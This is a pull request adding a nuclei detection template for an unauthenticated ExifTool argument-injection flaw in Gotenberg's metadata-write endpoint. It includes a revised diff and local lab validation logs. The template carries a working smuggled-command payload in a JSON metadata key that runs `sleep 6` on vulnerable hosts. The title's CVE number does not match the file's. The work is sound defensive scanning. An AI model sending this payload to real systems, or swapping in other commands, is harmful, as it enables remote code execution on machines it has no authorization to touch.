### PR TITLE
Add CVE-2024-12537 template

### DIFF
--- a/http/cves/2026/CVE-2026-42589.yaml
+++ b/http/cves/2026/CVE-2026-42589.yaml
@@ -1,36 +1,32 @@
 id: CVE-2026-42589
 
 info:
-  name: Gotenberg 8.29.1 - Unauthenticated ExifTool Metadata Key Injection RCE
+  name: Gotenberg - Command Injection
   author: fineman999
   severity: critical
   description: |
-    Gotenberg 8.29.1 is vulnerable to unauthenticated remote code execution
-    via metadata key newline injection in the /forms/pdfengines/metadata/write
-    endpoint. User-controlled metadata keys are passed to ExifTool without
-    rejecting control characters, allowing ExifTool argument injection.
-    This template uses a non-destructive sleep command to detect vulnerable
-    behavior by response timing.
+    Gotenberg < 8.31.0 contains a command injection caused by lack of validation on JSON metadata keys in /forms/pdfengines/metadata/write endpoint, letting unauthenticated attackers execute OS commands, exploit requires crafted HTTP request.
   impact: |
-    Successful exploitation allows unauthenticated attackers to execute
-    arbitrary OS commands as the Gotenberg process user.
+    Unauthenticated attackers can execute arbitrary OS commands remotely, potentially leading to full system compromise.
   remediation: |
-    Upgrade Gotenberg to version 8.31.0 or later.
+    Update to version 8.31.0 or later.
   reference:
     - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
     - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
-    - https://exiftool.org/exiftool_pod.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42589
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-42589
     cwe-id: CWE-78
-    cvss-score: 9.8
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   metadata:
     verified: true
     vendor: gotenberg
     product: gotenberg
     max-request: 2
-  tags: cve,cve2026,gotenberg,exiftool,rce,unauth,oastless
+  tags: cve,cve2026,gotenberg,exiftool,rce,unauth
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -38,13 +34,32 @@ http:
         GET /version HTTP/1.1
         Host: {{Hostname}}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'compare_versions(version, "< 8.31.0")'
+          - 'contains(to_lower(header), "gotenberg")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "([0-9.]+)"
+        internal: true
+
+  - raw:
       - |
         @timeout: 10s
         POST /forms/pdfengines/metadata/write HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----NucleiBoundaryCVE202642589
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
 
-        ------NucleiBoundaryCVE202642589
+        ------WebKitFormBoundary{{randstr}}
         Content-Disposition: form-data; name="files"; filename="sample.pdf"
         Content-Type: application/pdf
 
@@ -69,18 +84,16 @@ http:
         startxref
         186
         %%EOF
-        ------NucleiBoundaryCVE202642589
+        ------WebKitFormBoundary{{randstr}}
         Content-Disposition: form-data; name="metadata"
 
         {"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}
-        ------NucleiBoundaryCVE202642589--
+        ------WebKitFormBoundary{{randstr}}--
 
     matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - "status_code_1 == 200"
-          - "contains(body_1, '8.29.1')"
-          - "status_code_2 == 500"
-          - "duration_2 >= 6"
+          - "status_code == 500"
+          - "duration >= 6"
         condition: and

--- a/http/cves/2026/CVE-2026-42589.yaml
+++ b/http/cves/2026/CVE-2026-42589.yaml
@@ -1,0 +1,86 @@
+id: CVE-2026-42589
+
+info:
+  name: Gotenberg 8.29.1 - Unauthenticated ExifTool Metadata Key Injection RCE
+  author: fineman999
+  severity: critical
+  description: |
+    Gotenberg 8.29.1 is vulnerable to unauthenticated remote code execution
+    via metadata key newline injection in the /forms/pdfengines/metadata/write
+    endpoint. User-controlled metadata keys are passed to ExifTool without
+    rejecting control characters, allowing ExifTool argument injection.
+    This template uses a non-destructive sleep command to detect vulnerable
+    behavior by response timing.
+  impact: |
+    Successful exploitation allows unauthenticated attackers to execute
+    arbitrary OS commands as the Gotenberg process user.
+  remediation: |
+    Upgrade Gotenberg to version 8.31.0 or later.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
+    - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
+    - https://exiftool.org/exiftool_pod.html
+  classification:
+    cve-id: CVE-2026-42589
+    cwe-id: CWE-78
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: true
+    vendor: gotenberg
+    product: gotenberg
+    max-request: 2
+  tags: cve,cve2026,gotenberg,exiftool,rce,unauth,oastless
+
+http:
+  - raw:
+      - |
+        GET /version HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 10s
+        POST /forms/pdfengines/metadata/write HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----NucleiBoundaryCVE202642589
+
+        ------NucleiBoundaryCVE202642589
+        Content-Disposition: form-data; name="files"; filename="sample.pdf"
+        Content-Type: application/pdf
+
+        %PDF-1.1
+        1 0 obj
+        << /Type /Catalog /Pages 2 0 R >>
+        endobj
+        2 0 obj
+        << /Type /Pages /Kids [3 0 R] /Count 1 >>
+        endobj
+        3 0 obj
+        << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>
+        endobj
+        xref
+        0 4
+        0000000000 65535 f
+        0000000009 00000 n
+        0000000058 00000 n
+        0000000115 00000 n
+        trailer
+        << /Root 1 0 R /Size 4 >>
+        startxref
+        186
+        %%EOF
+        ------NucleiBoundaryCVE202642589
+        Content-Disposition: form-data; name="metadata"
+
+        {"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}
+        ------NucleiBoundaryCVE202642589--
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200"
+          - "contains(body_1, '8.29.1')"
+          - "status_code_2 == 500"
+          - "duration_2 >= 6"
+        condition: and


### PR DESCRIPTION
### PR Information

- Added `CVE-2026-42589` template for Gotenberg ExifTool metadata key injection RCE.
- Vulnerable endpoint: `/forms/pdfengines/metadata/write`
- Vulnerable parameter: metadata JSON object key
- Vulnerable tested version: `gotenberg/gotenberg:8.29.1`
- Patched tested version: `gotenberg/gotenberg:8.31.0`
- Detection method: `/version` fingerprint plus non-destructive timing check using `sleep 6`
- References:
  - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
  - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
  - https://exiftool.org/exiftool_pod.html

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against a local Docker reproduction lab.

Local validation target files:

- Public lab repo: https://github.com/fineman999/POC_CVE-2026-42589
- `docker-compose.yml`
- `docker-compose.latest.yml`
- `CVE-2026-42589.yaml`
- `manual_verify.py`
- `README.md`
- `sample.pdf`

Template validation:

```bash
nuclei -duc -validate -t http/cves/2026/CVE-2026-42589.yaml
```

Observed validation result:

```text
[INF] All templates validated successfully
```

Manual raw multipart timing check on the vulnerable target:

The `manual_verify.py` script in the public reproduction lab sends a raw multipart request with the same non-destructive `sleep 6` timing payload.

```bash
python3 manual_verify.py http://127.0.0.1:3000
```

Observed vulnerable response on `8.29.1`:

```text
HTTP/1.1 500 Internal Server Error
TOTAL_TIME=6.300s
Internal Server Error
```

Manual raw multipart timing check against patched `8.31.0`:

```bash
python3 manual_verify.py http://127.0.0.1:3000
```

Observed patched-version response:

```text
HTTP/1.1 400 Bad Request
TOTAL_TIME=0.145s
At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
```

True-positive validation:

```bash
nuclei -duc -u http://127.0.0.1:3000 -t http/cves/2026/CVE-2026-42589.yaml
```

Observed vulnerable result on `8.29.1` after the delayed `500` response:

```text
[CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
[INF] Scan completed in 6.245907708s. 1 matches found.
```

False-positive control against patched `8.31.0`:

```bash
curl -s http://127.0.0.1:3000/version
```

Observed patched-version response:

```text
8.31.0
```

Observed nuclei result on `8.31.0`:

```bash
nuclei -duc -u http://127.0.0.1:3000 -t http/cves/2026/CVE-2026-42589.yaml
```

Observed patched result:

```text
[INF] Scan completed in 93.01425ms. No results found.
```

The detection uses the `/version` endpoint to limit the check to the vulnerable tested version, then checks argument-injection behavior through response timing. It does not rely on a version banner alone.

### Additional References

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

### Notes

- The template intentionally avoids file writes, reverse shells, and out-of-band callbacks.
- The version scope is intentionally limited to observed behavior:
  - vulnerable on `8.29.1`
  - denied on `8.31.0`
- This does not claim any version boundary beyond the tested vulnerable and patched versions.
